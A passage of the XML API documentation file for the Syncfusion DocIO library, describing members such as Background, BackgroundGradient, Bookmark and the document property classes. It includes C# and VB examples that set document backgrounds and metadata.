            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Package.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Part">
            <summary>
            Summary description for Part.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Part.m_dataStream">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Part.#ctor(System.IO.Stream)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Part"/> class.
            </summary>
            <param name="dataStream">The data stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Part.Clone">
            <summary>
            Clones this instance.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Part.SetDataStream(System.IO.Stream)">
            <summary>
            Sets the data stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Part.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Part.DataStream">
            <summary>
            Gets data stream.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Part.Name">
            <summary>
            Gets/sets part name.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Relations">
            <summary>
            Summary description for Relation.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Relations.#ctor(Syncfusion.Compression.Zip.ZipArchiveItem)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Relations"/> class.
            </summary>
            <param name="item">The zip item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Relations.#ctor(System.IO.Stream,System.String)">
            <summary>
            
            </summary>
            <param name="dataStream"></param>
            <param name="name"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Relations.Clone">
            <summary>
            Clones this instance.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Relations.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Background">
            <summary>
            Represents the background effects.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Background.m_effectType">
            <summary>
            Class fields.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Background.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.BackgroundType)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Background"/> class.
            </summary>
            <param name="doc">The doc.</param>
            <param name="type">The type.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Background.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Internal constructor.
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Background.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Background"/> class.
            </summary>
            <param name="doc">The doc.</param>
            <param name="container">The container.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Background.Clone">
            <summary>
            Clones background object.
            </summary>
            <returns>Exact copy of background object</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Background.UpdateImageRecord(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Updates the image record.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Background.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Background.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Background.WriteXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentWriter)">
            <summary>
            Writes object data as inside xml element.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Background.ReadXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
            <returns>The value indicating the presence of xml content.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Background.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Background.SetBackgroundColor(System.Drawing.Color)">
            <summary>
            Sets the Background fill color
            </summary>
            <param name="color"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Background.SetPatternFill(System.IO.Stream)">
            <summary>
            Sets the Background pattern fill
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Background.GetBackgroundData(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer,System.Boolean)">
            <summary>
            Gets the background data.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Background.GetImage">
            <summary>
            Gets the image.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Background.GetImage(System.Byte[])">
            <summary>
            Gets the image.
            </summary>
            <param name="imageBytes">The image bytes.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Background.LoadImage(System.Drawing.Image)">
            <summary>
            Loads the image.
            </summary>
            <param name="image">The image.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Background.Type">
            <summary>
            Gets or sets the type of background effect.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.BackgroundType"/> member that specifies the type of background.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Background.Picture">
            <summary>
            Gets or sets the background picture.
            </summary>
            <value>The <see cref="T:System.Drawing.Image"/> that represents the background for the document.</value>
            <example>
            <para>The following code example demonstrates how to set the background for the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an instance of WordDocument class 
                WordDocument document = new WordDocument();
                //Set the background type of the document
                document.Background.Type = BackgroundType.Picture;
                //Set the background image of the document
                document.Background.Picture = Image.FromFile("Image.png");
                //Add one section with one paragraph to the document
                document.EnsureMinimal();
                //Add the text range to the last paragraph of the section
                document.LastParagraph.AppendText("Hello World!");
                //Save the document in the given name and format
                document.Save("Sample.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an instance of WordDocument class 
                Dim document As New WordDocument()
                'Set the background type of the document
                document.Background.Type = BackgroundType.Picture
                'Set the background image of the document
                document.Background.Picture = Image.FromFile("Image.png")
                'Add one section with one paragraph to the document
                document.EnsureMinimal()
                'Add the text range to the last paragraph of the section
                document.LastParagraph.AppendText("Hello World!")
                'Save the document in the given name and format
                document.Save("Sample.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Background.Image">
            <summary>
            Gets the image.
            </summary>
            <value>The image.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Background.Color">
            <summary>
            Gets or sets the background color of the document.
            </summary>
            <value>The <see cref="T:System.Drawing.Color"/> specifies the background color for this document.</value>
            <example>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into WordDocument instance
                WordDocument document = new WordDocument("Sample.docx");
                //Set the background type of the document
                document.Background.Type = BackgroundType.Color;
                //Set the background color of the document
                document.Background.Color = Color.AliceBlue;
                //Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close(); 
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into WordDocument instance
                Dim document As New WordDocument("Sample.docx")
                'Set the background type of the document
                document.Background.Type = BackgroundType.Color
                'Set the background color of the document
                document.Background.Color = Color.AliceBlue
                'Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Background.Gradient">
            <summary>
            Gets or sets the background gradient.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.BackgroundGradient"/> object that specifies the gradient effect.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.BackgroundGradient"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Background.ImageRecord">
            <summary>
            Gets the image record.
            </summary>
            <value>The image record.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Background.ImageBytes">
            <summary>
            Get/set background image as byte array. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Background.FillType">
            <summary>
            Get/set background fill type.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Background.PictureBackColor">
            <summary>
            Get background color for picture background.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Background.PatternFill">
            <summary>
            Gets or sets a pattern fill string.
            </summary>
            <value><c>true</c> if pattern fill string; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Background.PatternImageBytes">
            <summary>
            Gets or sets the pattern image.
            </summary>
            <value>The pattern image.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.BackgroundGradient">
            <summary>
            Represents the background gradient effect.
            </summary>
            <example>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an instance of WordDocument class 
                WordDocument document = new WordDocument();
                //Set the background type of the document
                document.Background.Type = BackgroundType.Gradient;
                //Set the first color of the background gradient of the document
                document.Background.Gradient.Color1 = Color.AliceBlue;
                //Set the second color of the background gradient of the document
                document.Background.Gradient.Color2 = Color.Purple;
                //Set the first shading style of the background gradient of the document
                document.Background.Gradient.ShadingStyle = GradientShadingStyle.DiagonalDown;
                //Set the first shading variant of the background gradient of the document
                document.Background.Gradient.ShadingVariant = GradientShadingVariant.ShadingMiddle;
                //Add one section with one paragraph to the document
                document.EnsureMinimal();
                //Add the text range to the last paragraph of the section
                document.LastParagraph.AppendText("Hello World!");
                //Save the document in the given name and format
                document.Save("Sample.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an instance of WordDocument class 
                Dim document As New WordDocument()
                'Set the background type of the document
                document.Background.Type = BackgroundType.Gradient
                'Set the first color of the background gradient of the document
                document.Background.Gradient.Color1 = Color.AliceBlue
                'Set the second color of the background gradient of the document
                document.Background.Gradient.Color2 = Color.Purple
                'Set the first shading style of the background gradient of the document
                document.Background.Gradient.ShadingStyle = GradientShadingStyle.DiagonalDown
                'Set the first shading variant of the background gradient of the document
                document.Background.Gradient.ShadingVariant = GradientShadingVariant.ShadingMiddle
                'Add one section with one paragraph to the document
                document.EnsureMinimal()
                'Add the text range to the last paragraph of the section
                document.LastParagraph.AppendText("Hello World!")
                'Save the document in the given name and format
                document.Save("Sample.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BackgroundGradient.DEF_VERTICAL_ANGLE">
            <summary>
            Class constants.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BackgroundGradient.m_fillType">
            <summary>
            Class fields.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BackgroundGradient.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.BackgroundGradient"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BackgroundGradient.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.BackgroundGradient"/> class.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
            <param name="container">The <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BackgroundGradient.Clone">
            <summary>
            Creates the duplicate copy of the background gradient.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.BackgroundGradient"/> which is a copy of current gradient.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BackgroundGradient.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc">The doc.</param>
            <param name="nextOwner"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BackgroundGradient.GetGradientData(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer)">
            <summary>
            Gets the gradient data.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BackgroundGradient.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BackgroundGradient.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BackgroundGradient.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BackgroundGradient.Color1">
            <summary>
            Gets or sets the first color for gradient effect.
            </summary>
            <value>The first <see cref="T:System.Drawing.Color"/> for the gradient effect.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BackgroundGradient.Color2">
            <summary>
            Gets or sets the second color for gradient effect.
            </summary>
            <value>The second <see cref="T:System.Drawing.Color"/> for the gradient effect.</value> 
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BackgroundGradient.ShadingStyle">
            <summary>
            Gets or sets the shading style for gradient effect.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.GradientShadingStyle"/> member that represents the shading style for gradient effect.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BackgroundGradient.ShadingVariant">
            <summary>
            Gets or sets the shading variants for gradient effect.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.GradientShadingVariant"/> member that represents the shading variants for gradient effect.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Bookmark">
            <summary>
            Represents the bookmark in the Word document which enclosed with <see cref="T:Syncfusion.DocIO.DLS.BookmarkStart"/> 
            and <see cref="T:Syncfusion.DocIO.DLS.BookmarkEnd"/>.
            </summary>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarksNavigator"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarkCollection"/>
            <seealso cref="P:Syncfusion.DocIO.DLS.Bookmark.BookmarkEnd"/>
            <seealso cref="P:Syncfusion.DocIO.DLS.Bookmark.BookmarkStart"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Bookmark.#ctor(Syncfusion.DocIO.DLS.BookmarkStart)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.BookmarkStart"/>.
            </summary>
            <param name="start">The <see cref="T:Syncfusion.DocIO.DLS.BookmarkStart"/> that represents the start of the bookmark.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Bookmark.#ctor(Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.BookmarkEnd)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.BookmarkStart"/> and <see cref="T:Syncfusion.DocIO.DLS.BookmarkEnd"/>.
            </summary>
            <param name="start">The <see cref="T:Syncfusion.DocIO.DLS.BookmarkStart"/> that represents the start of the bookmark.</param>
            <param name="end">The <see cref="T:Syncfusion.DocIO.DLS.BookmarkEnd"/> that represents the end of the bookmark.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Bookmark.SetStart(Syncfusion.DocIO.DLS.BookmarkStart)">
            <summary>
            Sets the bookmark start.
            </summary>
            <param name="start">The bookmark start.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Bookmark.SetEnd(Syncfusion.DocIO.DLS.BookmarkEnd)">
            <summary>
            Sets the bookmark end.
            </summary>
            <param name="end">The end.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Bookmark.Name">
            <summary>
            Gets the bookmark name. Read-only.
            </summary>
            <value>The <b>string </b> that represents the bookmark name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Bookmark.BookmarkStart">
            <summary>
            Gets the bookmark start. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.BookmarkStart"/> that represents the start of the bookmark.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Bookmark.BookmarkEnd">
            <summary>
            Gets the bookmark end. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.BookmarkEnd"/> that represents the end of the bookmark.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.BuiltinDocumentProperties">
            <summary>
            Represents the built-in document properties of Word document.
            </summary>
            <remarks>
            <para>The following list contains the names of all the available built-in document properties:</para>
            <list type="bullet">
            <item>Category</item>
            <item>Number of Bytes</item>
            <item>Number of Lines</item>
            <item>Number of Paragraphs</item>
            <item>Number of Slides</item>
            <item>Number of Notes</item>
            <item>Number of Hidden Slides</item>
            <item>Manager</item>
            <item>Company</item>
            </list>
            </remarks>
            <example>
            <para>The following code example demonstrates how to modify the built-in document properties of Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Set the value for Company property of the document
                document.BuiltinDocumentProperties.Company = "Northwind Traders";
                //Set the value for Manager property of the document
                document.BuiltinDocumentProperties.Manager = "Paul Anderson";
                //Set the value for Author property of the document
                document.BuiltinDocumentProperties.Author = "Peter";
                //Set the value for Comments property of the document
                document.BuiltinDocumentProperties.Comments = "This document provide the sales information of the year 2015";
                //Set the value for LastAuthor property of the document
                document.BuiltinDocumentProperties.LastAuthor = "Johnson";
                //Set the value for Title property of the document
                document.BuiltinDocumentProperties.Title = "Sales Information";
                //Set the value for Category property of the document
                document.BuiltinDocumentProperties.Category = "Sales";
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Set the value for Company property of the document
                document.BuiltinDocumentProperties.Company = "Northwind Traders"
                'Set the value for Manager property of the document
                document.BuiltinDocumentProperties.Manager = "Paul Anderson"
                'Set the value for Author property of the document
                document.BuiltinDocumentProperties.Author = "Peter"
                'Set the value for Comments property of the document
                document.BuiltinDocumentProperties.Comments = "This document provide the sales information of the year 2015"
                'Set the value for LastAuthor property of the document
                document.BuiltinDocumentProperties.LastAuthor = "Johnson"
                'Set the value for Title property of the document
                document.BuiltinDocumentProperties.Title = "Sales Information"
                'Set the value for Category property of the document
                document.BuiltinDocumentProperties.Category = "Sales"
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.SummaryDocumentProperties"/>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.SummaryDocumentProperties">
            <summary>
            Represents the summary information of the document.
            </summary>
            <remarks>
            <para>The following list contains the names of all the available summary document properties:</para>
            <list type="bullet">
            <item>Title</item>
            <item>Subject</item>
            <item>Author</item>
            <item>Keywords</item>
            <item>Comments</item>
            <item>Template</item>
            <item>Last Author</item>
            <item>Revision Number</item>
            <item>Application Name</item>
            <item>Last Print Date</item>
            <item>Creation Date</item>
            <item>Last Save Time</item>
            <item>Total Editing Time</item>
            <item>Number of Pages</item>
            <item>Number of Words</item>
            <item>Number of Characters</item>
            <item>Security</item>
            <item>Category</item>
            </list>
            </remarks>
            <seealso cref="T:Syncfusion.DocIO.DLS.BuiltinDocumentProperties"/>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.SummaryDocumentProperties.m_summaryHash">
            <summary>
            Sorted list of properties
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SummaryDocumentProperties.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SummaryDocumentProperties.#ctor(System.Int32)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SummaryDocumentProperties.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SummaryDocumentProperties.HasKey(System.Int32)">
            <summary>
            isSummary = true - summary property
            isSummary = false - document summary property
            </summary>
            <param name="key"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SummaryDocumentProperties.Add(System.Int32,Syncfusion.DocIO.DLS.DocumentProperty)">
            <summary>
            Adds the specified name.
            </summary>
            <param name="name">The name.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SummaryDocumentProperties.SetPropertyValue(Syncfusion.CompoundFile.DocIO.Native.PIDSI,System.Object)">
            <summary>
            
            </summary>
            <param name="pidsi"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SummaryDocumentProperties.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SummaryDocumentProperties.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SummaryDocumentProperties.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.Author">
            <summary>
            Gets or sets author name of the document.
            </summary>
            <value>The <b>string</b> that specifies the author property.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.ApplicationName">
            <summary>
            Gets or sets application name of the document.
            </summary>
            <value>The <b>string</b> that specifies the application name property.</value> 
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.Title">
            <summary>
            Gets or sets the title of the document.
            </summary>
            <value>The <b>string</b> that specifies the title property.</value> 
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.Subject">
            <summary>
            Gets or sets the subject of the document.
            </summary>
            <value>The <b>string</b> that specifies the subject property.</value> 
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.Keywords">
            <summary>
            Gets or sets the document keywords.
            </summary>
            <value>The <b>string</b> that specifies the keywords in the document.</value> 
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.Comments">
            <summary>
            Gets or sets the comments that provide additional information about the document.
            </summary>
            <value>The <b>string</b> that specifies the additional information about the document.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.Template">
            <summary>
            Gets or sets the template name of the document.
            </summary>
            <value>The <b>string</b> that specifies the template document name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.LastAuthor">
            <summary>
            Gets or sets the last author name of the document.
            </summary>
            <value>The <b>string</b> that specifies the last author name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.RevisionNumber">
            <summary>
            Gets or sets the document revision number.
            </summary>
            /// <value>The <b>string</b> that specifies the revision number.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.TotalEditingTime">
            <summary>
            Gets or sets the document total editing time.
            </summary>
            <value>The <b>TimeSpan</b> that specifies the total document editing time.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.LastPrinted">
            <summary>
            Gets or sets the last print date of the document.
            </summary>
            <value>The <b>DateTime</b> that specifies the time when the document is last printed.</value> 
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.CreateDate">
            <summary>
            Gets or sets the creation date of the document.
            </summary>
            <value>The <b>DateTime</b> that specifies the time when the document is created.</value> 
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.LastSaveDate">
            <summary>
            Gets or sets the last save date of the document.
            </summary>
            <value>The <b>DateTime</b> that specifies the time when the document is last saved.</value> 
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.PageCount">
            <summary>
            Gets total number of pages in the document
            </summary>
            <value>The <b>integer</b> that represents the total number of pages.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.WordCount">
            <summary>
            Gets total number of words in the document
            </summary>
            <value>The <b>integer</b> that represents the total number of words.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.CharCount">
            <summary>
            Gets the total number of characters in the document
            </summary>
            /// <value>The <b>integer</b> that represents the total number of characters.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.Thumbnail">
            <summary>
            Gets or sets thumbnail picture for document preview
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.DocSecurity">
            <summary>
            Gets or sets document security level
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.Item(Syncfusion.CompoundFile.DocIO.Native.PIDSI)">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.Count">
            <summary>
            Gets summary count of document properties
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SummaryDocumentProperties.SummaryHash">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.m_documentHash">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.#ctor">
            <summary>
            Initialize
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.#ctor(System.Int32,System.Int32)">
            <summary>
            Initialize
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initialize
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.HasKey(System.Int32)">
            <summary>
            isSummary = true - summary property
            isSummary = false - document summary property
            </summary>
            <param name="key"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.Clone">
            <summary>
            Creates a duplicate copy of the current built-in properties.
            </summary>
            <returns>The new <see cref="T:Syncfusion.DocIO.DLS.BuiltinDocumentProperties"/> that is created.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.SetPropertyValue(Syncfusion.CompoundFile.DocIO.Native.PIDDSI,System.Object)">
            <summary>
            
            </summary>
            <param name="piddsi"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.Category">
            <summary>
